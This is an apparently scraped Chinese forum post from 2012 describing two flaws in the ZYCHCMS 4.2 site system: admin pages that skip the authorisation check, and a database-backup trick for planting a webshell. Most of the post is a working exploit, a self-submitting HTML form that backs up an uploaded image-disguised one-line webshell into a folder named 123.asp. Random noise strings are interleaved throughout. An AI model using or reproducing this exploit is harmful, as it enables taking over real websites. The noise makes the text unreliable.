- w: J" g7 g( Q: Y t* y
8 M" i9 v+ W6 d$ j" C4 C, R! k! V2 X; y2 X/ w: [" u( V
3 h. }# ?) X6 n7 A& @4 W# Z! ^影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)6 v* a: K8 N; {- r7 ~) N* M
①SQL注射漏洞
' j, o$ ]5 ?, \' b) T" h4 R+ x. @ 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp p( B. I) z' ?6 w/ ^
漏洞原因:未过滤
8 f* G: K2 e3 U/ w0 C 漏洞代码:( K) Q: B* c, B7 q& X: x( E
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。7 \! ~ H% g. f' N, j( F& C9 S
修复方法:在文件开头加入代码
b- u# e$ N: }% ^5 _ 6 H9 ~1 D% F* m' \7 m4 T* z3 H- i8 C
0 C, C! b! z* y2 j$ D
②后台拿WBSHELL7 b" U) A, U \7 q1 O; j4 j
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。" W5 F+ `( M) x; d
这里在网上找了一个,改了下,将就着用。
6 `% J) ?9 J9 F* q 以下是代码本地提交代码4 @% U5 ]8 j/ {0 x: ?4 S
% Q3 R* J3 I, G% r
! o* W' j3 t- z3 j; I$ n
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>' B/ F- V1 r, _
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
9 G7 u- \. E1 C2 _3 r4 f <tr>& v4 c- m; d0 U
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>* D, d. F& i( S( j, Q" u
</tr>
8 B, T+ B6 k) `; t' N0 I <tr>
4 C! Z( z- W( m& p) t <td bgcolor=”#FFFFFF”><span class=”back_southidc”>/ F y4 }8 E8 m( g( v- t1 ?2 z
</span>' W: T7 S1 g2 @* Q! Q
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
" X3 a. ], k. u2 p% K' T <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >- k6 ]: Y# M( A* B' i
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>- S1 S( f, a6 I: S& ^
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d8 K: q( k; w& T3 `- f4 D8 U
<div align=”left”>
; C7 u5 t9 B: i- Z; f <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
& v- m* @% j& Z <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
1 q5 @4 F$ Y ]0 T, C) O <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />2 T1 B: r' v( f/ C" e; v# n' n
</div></td>7 X1 W% D% Z1 i
</tr>
) k E8 _% v* k7 y3 `2 `1 u <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
. _0 c' X u5 ~: y3 l <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>7 W0 q" k* H( x* [( e, g# ^
<td class=”td”><div align=”left”>) k: H' r7 R5 \: X/ H1 ]5 O f
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” /> J7 V% ], `3 W, z- Q) X
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>1 S! I3 d6 @! k6 A9 ]! p
</tr>
% \# f( f! z+ z; i9 Y- ]) s <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
) g. k/ I9 y# e <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>9 N, m: x3 Q2 C# A7 j/ q
<td class=”td”><div align=”left”> J6 d; M& M7 ^
<input type=”submit” value=”确定备份” class=”btn”7 |( x# U/ }/ S0 Q6 G1 u
</div></td>
- `8 C5 P7 I# R; d+ R% R </tr>
3 a. ]# N8 s) l A0 W </table></td></tr></form>. U9 } ^- F# @/ L, F8 L
</table>8 _+ r% X7 Q3 q+ B o
</td>. F0 G6 r3 N, z; M6 t8 b$ T( V" e
</tr>
& m5 k7 a6 e5 ?+ v </table>8 X- X, ?7 p) W6 C+ q
<script>( V1 A1 S: N( [" N1 l4 h
document.all.add.submit();
4 F% W( k* p! x3 t6 a P! Q5 _ </script>
, q% v- _0 a* E* T. q. H( D+ K2 i
* @( T% U1 T* O9 \) u* X) `
+ l5 U" d/ A* ]$ S" x; K" x" K# R* D8 B8 u7 @; l
$ g( m' B% W1 a# {& U
4 S& _8 L8 W9 u" t# F) X
$ M5 E- @* O& z7 x2 B
8 t; D* l! \2 y# a( ^1 i0 U" L; o
; S5 h+ m$ A: c/ _0 I3 O: P
1 `2 I' x& l$ N2 n- ^$ e) z. P |
发表于 2012-9-10 21:09:51
收藏
支持
反对